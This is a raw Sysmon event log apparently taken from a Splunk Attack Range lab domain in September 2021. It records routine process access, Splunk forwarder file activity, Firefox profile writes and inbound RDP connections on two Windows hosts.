09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976353Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976352Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-882D-6151-7879-00000000FD01}1572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976351Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.343{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-882D-6151-7879-00000000FD01}1572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976350Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.328{69CF5F33-882D-6151-7879-00000000FD01}1572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976367Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:30.952{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15F4D0E041A3AF420B15DB9D545A3F24,SHA256=51B009DF050204CB3FC0AEB5BABAA089AAAA17F046E110DA818D653C46CBB391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:30.920{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EA5C06C26998CBC9B4A476978E0AD88,SHA256=96256F5CE8258782925E88011F15D2760D9D5363726A5720157129CA70024D76,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976366Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.883{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-56473-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:30.720{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8E45D3F90516025A1D739921D390CCF,SHA256=B11F7503C7E1311FE35F5F136D628FC258884A4A3E3ABEB6BCA120B616792388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:30.720{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD4A016844E43DD9811588470009824E,SHA256=FF09017E8BB261895236CDEDA87A24F9B1588D138D21C154A56CFA179B86CD9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976368Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:31.968{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7A97B75B37A7A5D633480EF58525A5B,SHA256=B71C2B87E689F7883D529B1533540E9362EEB68A2BB30EF4BE4DEE5066B7C75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.736{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=B358908272D891D94EE21F1CE6A2AC0D,SHA256=A1AAEEBF545BDC2060083DEE061CF95BB160F7B1D7CB4A3759D48802100C4AAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.736{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=CBA003B9D12780F1E00B368480B02F17,SHA256=D169AE0ABC9A6175BC812B8302D5669AD3A25264880AC62E9AD53DE4FA60D932,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.736{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=69ECE88C05AAEFEAFB973816ABC83EAB,SHA256=FA329A45AF6E10B1289469D2A9828B39B5FE0E8ECE393EB87335D56D6EFE7D01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.736{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=F6D96F70967E41576DC81E0B1800B1E3,SHA256=E6900290D1E9F042A7DB0D18684BAF1570CB64568594BB7E42FED2682AD7580B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.736{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=6A40B19543BDCB400FA681F1B6A5FF38,SHA256=CD2D2907CE6F50A774078C4D2F3FD3A3F1C3F9501CBD837CD5549C80D493E49E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.736{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=13089060964BCDE28A5A40D7F74C7134,SHA256=9A5A7E2582A433E3A1CBD2CC589DDC582549D126553DF6EE494E3125ADD2DCCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.189{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.189{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.189{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001047795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:28.638{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50493-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:32.535{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=FE53614D4DD49C843BFEFFDCE2E0D8AA,SHA256=22A7234DFF136E6AEB56566D8026E9A9735490A65D664037FCDC908C4CC9011B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:32.535{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:32.020{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8E6F6BDCB6B25FF15D36EA9D0EF577,SHA256=C2AA4B7DF84541257BA51F9DD6EAF7EFA6E3C6469F522A76B320C3751C83EA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976370Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:32.686{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3AD2B24DC6658A6CF437E6A3811B8457,SHA256=847019E3649EF28443FC9D2236AC6D80DBFCD4E52569C11D11E808FD4C530859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976369Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:32.468{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1B6E7BE0F0C4E75A9B4A8C1DB9DC8215,SHA256=DAED3C86CDBE84CB4411D4E78749846DAF66A9ABA15D8A36E37C60539E9B5CA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:33.087{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D1409A08E5A504EDF72071892A56C6,SHA256=21DA47B27F45F2D068696F60E8CD906D00A1F0812654AB7E26B22BF1C5D432E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976373Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:30.430{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-30370-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976372Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:29.951{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51865-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976371Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:33.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0E8C912A854D40E33388D630A794835,SHA256=FFD48F1D47EC70ACB71EEA753EFB4E70409F743BA4E6C52E7C0BF65A2E42A055,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:31.758{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49208-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:34.117{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C812AD7ADF90EDDBA915BEC9DDC8E11,SHA256=55C4FC2125B3AE7A064792FA551F7496C14770232E34E430C372C3E5BF4EF422,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976375Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:30.861{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59249-false10.0.1.12-8000- 23542300x8000000000000000976374Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:34.061{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=030FE4D787FABB75DEF4733274F813CC,SHA256=2B5063FF0FDA9B73ACFCF3D0BE25FD0C7DBADDBF6E0ACE3EBE9D3A1933D01A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:35.133{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C161EE3F18BB54F36632F04F29D949FB,SHA256=70B04202AD68C059433B18A8C37C73F068CDFFD08BB86DEFC2936E5F05BE9448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976377Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:35.780{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CFD3C92BAC1083A673C4F08904A4A22,SHA256=728FACDADB0D6D681C9624257066B6B79B991A949A9446D7D14A9C9F756EB869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976376Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:35.233{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA129EC9E7D81196BD125FBE5428BD45,SHA256=417BB3613CB3ADC24C0DD38BA913C24F3B4EB158A1A2BC649189545320B778D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976378Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:36.311{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1075FFB752767959F040D93FFDD600B,SHA256=6DDC808A119CD751FCF1D63501004F81100C2B5F8BC00CD5CC9E04120D30DFE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:36.385{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:36.347{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72C4E2B63B190FD55E22352E80BEBA4E,SHA256=018884482B423466E51DF30CD7F427AE02ABA6C4731977B37F85935B6D39707C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:36.347{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8E45D3F90516025A1D739921D390CCF,SHA256=B11F7503C7E1311FE35F5F136D628FC258884A4A3E3ABEB6BCA120B616792388,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:34.058{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53752-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:36.147{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CBE1EE1CD4DC60029393FB25F9FAE53,SHA256=93904EA23221318BDF24E107F749BE6F46364A3031396C86A20898348491D9D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976392Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8835-6151-7979-00000000FD01}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976391Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:37.733{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 